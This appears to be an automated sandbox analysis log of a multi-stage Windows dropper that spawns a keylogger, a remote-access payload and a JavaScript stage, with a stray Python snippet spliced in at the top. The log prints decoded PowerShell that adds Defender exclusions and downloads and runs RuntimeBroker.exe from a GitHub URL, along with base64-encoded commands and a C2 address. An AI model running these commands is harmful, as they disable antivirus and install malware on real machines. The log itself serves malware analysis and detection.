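Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2332 Thread sleep time: -698000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2332 Thread sleep time: -417000s >= -30000s
""".strip().splitlines()

if __name__ == "__main__":
    for (image, tid), tags in sorted(triage_sleeps(SAMPLE_LINES).items()):
        print(f"{image:<16} TID {tid:<5} {', '.join(tags) or '-'}")
```

`triage_sleeps` accepts any iterable of report lines, so the whole behaviour section can be fed through it unchanged; lines it does not recognise are skipped. Note that `webhook.exe` TID 6428 shows both patterns: five parked waits followed by a countdown of ten-minute sleeps, which is the "600000, 598916, ..." sequence above.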
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\pSo*T
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxService%\\.\PhysicalDrive0
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: final.exe, 0000000B.00000002.1518447401.00000000013B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\virus.exe.bin.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\dllhost.exe Network Connect: 46.121.250.34 7777
Source: Payload.exe.11.dr, kl.cs Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: Payload.exe.11.dr, kl.cs Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Payload.exe.11.dr, OK.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Users\user\Desktop\virus.exe.bin.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe"
Source: C:\Users\user\Desktop\virus.exe.bin.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\HugeHack.jar"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js" /elevate
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_023203C0 cpuid 12_2_023203C0
Source: C:\Users\user\Desktop\virus.exe.bin.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\6252 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Roaming\dllhost.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Wireshark.exe
